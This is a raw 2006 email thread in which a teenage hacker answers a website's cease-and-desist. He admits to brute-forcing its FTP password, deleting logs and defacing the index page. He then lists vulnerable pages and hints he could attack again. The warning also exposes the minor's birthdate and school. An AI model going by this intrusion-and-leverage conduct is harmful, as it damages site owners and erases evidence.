; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid
rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
To Saeed,<br><br>This is our first and final warning in regards to your recent
intrusion to our website <a
href="http://www.milliondollarfreeload.com">www.milliondollarfreeload.com</a>. Our
record indicates that you have hacked into our server once and had over 300 attempts
in hacking our email system. We would like to inform you that hacking is
a federal crime.
<br><br>We ran a simple search of you and this is some of the information that
turned out:<br><br>Male<br>16 years old<br>August 08, 1989<br>Corona,
CALIFORNIA<br>United States<br><br>Santiago High School<br>Norco,California
<br><br>As mentioned above, this is a final warning. If any type of these
activities continues, we will report you to the authority (<a
href="http://www.usdoj.gov/criminal/cybercrime/reporting.htm">http://www.usdoj.gov/c
riminal/cybercrime/reporting.htm
</a>) and pursue for all of the damages you may have caused. We ask you
to kindly stop here because a criminal record may hurt your future
career.<br><br>--Admin<br><a
href="http://www.milliondollarfreeload.com">www.milliondollarfreeload.com
</a><br><br></blockquote></div><br>
------=_Part_39129_24992824.1155221525852--
X-Gmail-Received: 3788a4a66a447a8f0ceaffd8de0bc038a90cfee2
Delivered-To: charade000@gmail.com
Received: by 10.70.63.17 with SMTP id l17cs112798wxa;
Thu, 10 Aug 2006 09:10:56 -0700 (PDT)
Received: by 10.67.101.8 with SMTP id d8mr2786610ugm;
Thu, 10 Aug 2006 09:10:56 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Thu, 10 Aug 2006 09:10:56 -0700 (PDT)
Message-ID: <9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
Date: Thu, 10 Aug 2006 09:10:56 -0700
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_72593_6397638.1155226256172"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
------=_Part_72593_6397638.1155226256172
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Hello Saeed,
Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going
to continue hacking us?
Andrew
On 8/10/06, Charade <charade000@gmail.com> wrote:
>
> Dear Tillie,
>
> First of all i would like to make it clear that i never gained root to the
> server, nor had 300 attempts to penetrate your email system, I gained access
> through your FTP port which was vulnerable to Brutus because of the weak
> password. And as for the search, Im not impressed, you have me on your
> myspace and could have *easily* got the information from there, and i could
> do the same.
>
>
> I'd also like to inform you that when i did have root( in the FTP that
> is), I had the oppurtunity to cause catastrophic damage, I could have easily
> accessed the bank accounts of your members, and yours as well, You should be
> thanking me that my ethics were against this, and in replacement the only
> damage i did was deleting the logs, and replacing the index.html
>
> I wont pursue damage to hack your site, so you can be rest assured on
> this. But, i am offering my services to assist you in securing your website,
> because I can at the moment deface it again, through many other ways
> including an SQL Injection.
>
> in Conclusion, show me the logs , or any kind of proof that indicate i
> hacked your server. I am offering my allegiance to HELPING you.
>
> Dont refuse.
>
------=_Part_72593_6397638.1155226256172
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com">charade000@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: #ccc 1px solid">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br>
------=_Part_72593_6397638.1155226256172--
X-Gmail-Received: cac8c250dea915e5c0b1ab660242c1afbd5b3884
Received: by 10.70.63.17 with HTTP; Thu, 10 Aug 2006 11:17:08 -0700 (PDT)
Message-ID: <42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
Date: Thu, 10 Aug 2006 11:17:08 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_41818_313195.1155233828751"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_41818_313195.1155233828751
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Of course I wouldnt do it as a job, im doing this out of kindess to help
you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you know
where to find me.
First of all, you have tons of directories vulnerable to cross site
scripting
especially in the display_map.php
and demo/sendurl.php
-clean up the coding on the /admin.php
*Fatal error*: Call to undefined function: gettext() in *
/home/jaenergy/public_html/admin.php* on line *26
Thats*:* how i was able to find out your user name was jaenergy.
And if i spent more time im sure i can find more..
Just curious though because i thought the admin of the website was a girl
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
is saying that is her website.
And that she coded it herself, which is a lie because i noticed it used
pagekits.
And btw, can you send me the proof that show me i wa sin the server
Just curious.
*
On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Hello Saeed,
>
> Please explain what you can do to secure the site. Are you helping as a
> hobby or as a job? Let's say if we are not looking in hiring, are you going
> to continue hacking us?
>
> Andrew
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Dear Tillie,
> >
> > First of all i would like to make it clear that i never gained root to
> > the server, nor had 300 attempts to penetrate your email system, I gained
> > access through your FTP port which was vulnerable to Brutus because of the
> > weak password. And as for the search, Im not impressed, you have me on your
> > myspace and could have *easily* got the information from there, and i could
> > do the same.
> >
> >
> > I'd also like to inform you that when i did have root( in the FTP
> > that is), I had the oppurtunity to cause catastrophic damage, I could have
> > easily accessed the bank accounts of your members, and yours as well, You
> > should be thanking me that my ethics were against this, and in replacement
> > the only damage i did was deleting the logs, and replacing the
> > index.html
> >
> > I wont pursue damage to hack your site, so you can be rest assured on
> > this. But, i am offering my services to assist you in securing your website,
> > because I can at the moment deface it again, through many other ways
> > including an SQL Injection.
> >
> > in Conclusion, show me the logs , or any kind of proof that indicate i
> > hacked your server. I am offering my allegiance to HELPING you.
> >
> > Dont refuse.
> >
>
>
------=_Part_41818_313195.1155233828751
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Of course I wouldnt do it as a job, im doing this out of kindess to help
you. Im a hacker not a criminal. I don't have time to sit here and do Penetration
tests on your server, but i will point out certain things.<br><br>
But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236">http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&frien
did=86281236</a><br>is saying that is her website.
<br>And that she coded it herself, which is a lie because i noticed it used
pagekits.<br><span style="font-weight: bold;"><br>And btw, can you send me the proof
that show me i wa sin the server<br>Just curious.<br></span>
<span style="font-weight: bold;"></span><br></b><br><br><div><span
class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA Synergy</b> <<a
href="mailto:jasynergy@gmail.com">jasynergy@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"><div><div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div><div><span class="q" id="q_10cf8d9c39c80d9b_1">
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br>
</span></div></blockquote></div><br>
------=_Part_41818_313195.1155233828751--
X-Gmail-Received: a2aa0aa254676fa864fbb0a0cdc06bd89b294f1a
Delivered-To: charade000@gmail.com
Received: by 10.70.63.17 with SMTP id l17cs123829wxa;
Thu, 10 Aug 2006 14:02:35 -0700 (PDT)
Received: by 10.67.101.8 with SMTP id d8mr3188560ugm;
Thu, 10 Aug 2006 14:02:34 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Thu, 10 Aug 2006 14:02:34 -0700 (PDT)
Message-ID: <9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
Date: Thu, 10 Aug 2006 16:02:34 -0500
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_79711_29087486.1155243754397"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
------=_Part_79711_29087486.1155243754397
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.
On 8/10/06, Charade <charade000@gmail.com> wrote:
>
> Of course I wouldnt do it as a job, im doing this out of kindess to help
> you. Im a hacker not a criminal. I don't have time to sit here and do
> Penetration tests on your server, but i will point out certain things.
>
> But, if you needed someone to hire to administrate your servers, or a
> "consultant" to spend his day running tests im more than happy, and you know
> where to find me.
>
> First of all, you have tons of directories vulnerable to cross site
> scripting
> especially in the display_map.php
> and demo/sendurl.php
>
> -clean up the coding on the /admin.php
> *Fatal error*: Call to undefined function: gettext() in *
> /home/jaenergy/public_html/admin.php* on line *26
> Thats*:* how i was able to find out your user name was jaenergy.
>
> And if i spent more time im sure i can find more..
>
> Just curious though because i thought the admin of the website was a girl
>
> http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> is saying that is her website.
> And that she coded it herself, which is a lie because i noticed it used
> pagekits.
>
> And btw, can you send me the proof that show me i wa sin the server
> Just curious.
>
> *
>
>
> On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
> >
> > Hello Saeed,
> >
> > Please explain what you can do to secure the site. Are you helping as a
> > hobby or as a job? Let's say if we are not looking in hiring, are you going
> > to continue hacking us?
> >
> > Andrew
> >
> > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > >
> > > Dear Tillie,
> > >
> > > First of all i would like to make it clear that i never gained root to
> > > the server, nor had 300 attempts to penetrate your email system, I gained
> > > access through your FTP port which was vulnerable to Brutus because of the
> > > weak password. And as for the search, Im not impressed, you have me on your
> > > myspace and could have *easily* got the information from there, and i could
> > > do the same.
> > >
> > >
> > > I'd also like to inform you that when i did have root( in the FTP
> > > that is), I had the oppurtunity to cause catastrophic damage, I could have
> > > easily accessed the bank accounts of your members, and yours as well, You
> > > should be thanking me that my ethics were against this, and in replacement
> > > the only damage i did was deleting the logs, and replacing the
> > > index.html
> > >
> > > I wont pursue damage to hack your site, so you can be rest assured
> > > on this. But, i am offering my services to assist you in securing your
> > > website, because I can at the moment deface it again, through many other
> > > ways including an SQL Injection.
> > >
> > > in Conclusion, show me the logs , or any kind of proof that indicate
> > > i hacked your server. I am offering my allegiance to HELPING you.
> > >
> > > Dont refuse.
> > >
> >
> >
>
------=_Part_79711_29087486.1155243754397
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<div>Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.<br><br> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com">charade000@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: #ccc 1px solid">
<div> Of course I wouldnt do it as a job, im doing this out of kindess to
help you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
<br><br> But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a onclick="return top.js.OpenExtLink(window,event,this)"
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236"
target="_blank">http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&
;friendid=86281236
</a><br>is saying that is her website. <br>And that she coded it herself, which is a
lie because i noticed it used pagekits.<br><span style="FONT-WEIGHT: bold"><br>And
btw, can you send me the proof that show me i wa sin the server
<br>Just curious.<br></span><span style="FONT-WEIGHT: bold"></span><br></b></div>
<div><span class="e" id="q_10cf94d50492f15b_1"><br><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div>
<div><span>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br></span></div></blockquote></div>
<br></span></div></blockquote></div><br>
------=_Part_79711_29087486.1155243754397--
X-Gmail-Received: fa6838bd55c73ee47325cfd4f90cbd80b012a0dc
Received: by 10.70.63.17 with HTTP; Thu, 10 Aug 2006 14:24:48 -0700 (PDT)
Message-ID: <42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
Date: Thu, 10 Aug 2006 14:24:48 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_44066_13773717.1155245088400"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_44066_13773717.1155245088400
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Thanks, appreciate it.
On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Thanks for your help. I will try to fix the problems that you suggest. I
> will contact my server admin for the log.
>
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Of course I wouldnt do it as a job, im doing this out of kindess to
> > help you. Im a hacker not a criminal. I don't have time to sit here and do
> > Penetration tests on your server, but i will point out certain things.
> >
> > But, if you needed someone to hire to administrate your servers, or a
> > "consultant" to spend his day running tests im more than happy, and you know
> > where to find me.
> >
> > First of all, you have tons of directories vulnerable to cross site
> > scripting
> > especially in the display_map.php
> > and demo/sendurl.php
> >
> > -clean up the coding on the /admin.php
> > *Fatal error*: Call to undefined function: gettext() in *
> > /home/jaenergy/public_html/admin.php* on line *26
> > Thats*:* how i was able to find out your user name was jaenergy.
> >
> > And if i spent more time im sure i can find more..
> >
> > Just curious though because i thought the admin of the website was a
> > girl
> >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> >
> > is saying that is her website.
> > And that she coded it herself, which is a lie because i noticed it used
> > pagekits.
> >
> > And btw, can you send me the proof that show me i wa sin the server
> > Just curious.
> >
> > *
> >
> >
> > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > >
> > > Hello Saeed,
> > >
> > > Please explain what you can do to secure the site. Are you helping as
> > > a hobby or as a job? Let's say if we are not looking in hiring, are you
> > > going to continue hacking us?
> > >
> > > Andrew
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Dear Tillie,
> > > >
> > > > First of all i would like to make it clear that i never gained root
> > > > to the server, nor had 300 attempts to penetrate your email system, I gained
> > > > access through your FTP port which was vulnerable to Brutus because of the
> > > > weak password. And as for the search, Im not impressed, you have me on your
> > > > myspace and could have *easily* got the information from there, and i could
> > > > do the same.
> > > >
> > > >
> > > > I'd also like to inform you that when i did have root( in the FTP
> > > > that is), I had the oppurtunity to cause catastrophic damage, I could have
> > > > easily accessed the bank accounts of your members, and yours as well, You
> > > > should be thanking me that my ethics were against this, and in replacement
> > > > the only damage i did was deleting the logs, and replacing the
> > > > index.html
> > > >
> > > > I wont pursue damage to hack your site, so you can be rest assured
> > > > on this. But, i am offering my services to assist you in securing your
> > > > website, because I can at the moment deface it again, through many other
> > > > ways including an SQL Injection.
> > > >
> > > > in Conclusion, show me the logs , or any kind of proof that
> > > > indicate i hacked your server. I am offering my allegiance to HELPING you.
> > > >
> > > > Dont refuse.
> > > >
> > >
> > >
> >
>
------=_Part_44066_13773717.1155245088400
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Thanks, appreciate it.<br><div><span class="gmail_quote">On 8/10/06, <b
class="gmail_sendername">JA Synergy</b> <<a
href="mailto:jasynergy@gmail.com">jasynergy@gmail.com</a>>
wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204,
204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div><div>Thanks for your help. I will try to fix the problems that you
suggest. I will contact my server admin for the
log.<br><br> </div></div><div><span class="e" id="q_10cf9e4c28ee25ed_1">
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div> Of course I wouldnt do it as a job, im doing this out of kindess to
help you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
<br><br> But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">http://profile.myspace.com/index.cfm?fuseacti
on=user.viewprofile&friendid=86281236
</a><br>is saying that is her website. <br>And that she coded it herself, which is a
lie because i noticed it used pagekits.<br><span style="font-weight: bold;"><br>And
btw, can you send me the proof that show me i wa sin the server
<br>Just curious.<br></span><span style="font-weight: bold;"></span><br></b></div>
<div><span><br><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a href="mailto:jasynergy@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div>
<div><span>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br></span></div></blockquote></div>
<br></span></div></blockquote></div><br>
</span></div></blockquote></div><br>
------=_Part_44066_13773717.1155245088400--
X-Gmail-Received: a973a627762b90f8f9bc8a2e096d3039a05d9e9b
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs115948wxa;
Sun, 20 Aug 2006 06:57:34 -0700 (PDT)
Received: by 10.67.89.5 with SMTP id r5mr2944991ugl;
Sun, 20 Aug 2006 06:57:33 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Sun, 20 Aug 2006 06:57:33 -0700 (PDT)
Message-ID: <9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
Date: Sun, 20 Aug 2006 06:57:33 -0700
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_31339_21983036.1156082253761"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
------=_Part_31339_21983036.1156082253761
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Hello Saeed,
Just writing to let you know that I am waiting for my admin the send me the
log. Do you still want it?
Regards,
Andrew
On 8/10/06, Charade <charade000@gmail.com> wrote:
>
> Thanks, appreciate it.
>
> On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
> >
> > Thanks for your help. I will try to fix the problems that you suggest.
> > I will contact my server admin for the log.
> >
> >
> > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > >
> > > Of course I wouldnt do it as a job, im doing this out of kindess to
> > > help you. Im a hacker not a criminal. I don't have time to sit here and do
> > > Penetration tests on your server, but i will point out certain things.
> > >
> > > But, if you needed someone to hire to administrate your servers, or a
> > > "consultant" to spend his day running tests im more than happy, and you know
> > > where to find me.
> > >
> > > First of all, you have tons of directories vulnerable to cross site
> > > scripting
> > > especially in the display_map.php
> > > and demo/sendurl.php
> > >
> > > -clean up the coding on the /admin.php
> > > *Fatal error*: Call to undefined function: gettext() in *
> > > /home/jaenergy/public_html/admin.php* on line *26
> > > Thats*:* how i was able to find out your user name was jaenergy.
> > >
> > > And if i spent more time im sure i can find more..
> > >
> > > Just curious though because i thought the admin of the website was a
> > > girl
> > >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > >
> > > is saying that is her website.
> > > And that she coded it herself, which is a lie because i noticed it
> > > used pagekits.
> > >
> > > And btw, can you send me the proof that show me i wa sin the server
> > > Just curious.
> > >
> > > *
> > >
> > >
> > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > >
> > > > Hello Saeed,
> > > >
> > > > Please explain what you can do to secure the site. Are you helping
> > > > as a hobby or as a job? Let's say if we are not looking in hiring, are you
> > > > going to continue hacking us?
> > > >
> > > > Andrew
> > > >
> > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > >
> > > > > Dear Tillie,
> > > > >
> > > > > First of all i would like to make it clear that i never gained
> > > > > root to the server, nor had 300 attempts to penetrate your email system, I
> > > > > gained access through your FTP port which was vulnerable to Brutus because
> > > > > of the weak password. And as for the search, Im not impressed, you have me
> > > > > on your myspace and could have *easily* got the information from there,
and
> > > > > i could do the same.
> > > > >
> > > > >
> > > > > I'd also like to inform you that when i did have root( in the
> > > > > FTP that is), I had the oppurtunity to cause catastrophic damage, I could
> > > > > have easily accessed the bank accounts of your members, and yours as well,
> > > > > You should be thanking me that my ethics were against this, and in
> > > > > replacement the only damage i did was deleting the logs, and replacing the
> > > > > index.html
> > > > >
> > > > > I wont pursue damage to hack your site, so you can be rest
> > > > > assured on this. But, i am offering my services to assist you in securing
> > > > > your website, because I can at the moment deface it again, through many
> > > > > other ways including an SQL Injection.
> > > > >
